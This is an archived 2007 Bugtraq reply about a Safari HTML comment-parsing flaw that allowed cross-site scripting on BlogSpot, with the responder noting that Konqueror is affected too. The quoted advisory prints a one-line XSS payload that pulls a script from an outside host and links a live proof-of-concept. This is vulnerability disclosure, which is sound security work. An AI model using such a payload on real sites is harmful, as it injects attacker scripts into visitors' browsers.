lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed, 24 Jan 2007 06:06:34 +0100
From: Robert Tasarz <robert.tasarz@...entech.pl>
To: bugtraq@...urityfocus.com
Subject: Re: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability

Jose Avila III wrote:
> Overview:
> 
> Safari on occasions may improperly parse the source of an HTML document,
> which can lead to the execution of html tags within comments. This can
> become dangerous when input filters allow html tags within comments, as
> they will get parsed and executed under certain circumstances.
> 
> Details:
> 
> In some cases you can cause Appleā€™s Safari browser to execute code when
> it should not be executed. In the following example everything within
> the comment, in theory should never be executed; however, safari decides
> to execute the script tag.
> 
> <title>myblog<!--</title></head><body><script
> src=http://beanfuzz.com/bean.js> --></title>
> 
> Blogs hosted on BlogSpot.com have filter mechanisms for their input;
> however, they will allow you to inject anything within comments. This
> made it possible to cross site script blogspot.com. Note: Only Safari
> viewers will be affected.
> 
> Proof of concept: http://dirtybean1234.blogspot.com/
> 
> Initial release of vulnerability: http://www.beanfuzz.com/wordpress/?p=99
> 
> Vendor Response:
> 
> I was unable to get a response from the vendor in regards to this issue
> 
> Questions / Comments:
> Jose (at) onzra (dot) com
> 

As could be expected, the same problem exists in Konqueror (tested
v.3.5.5 on Debian GNU/Linux Sid).

regards,
  Robert Tasarz

Powered by blists - more mailing lists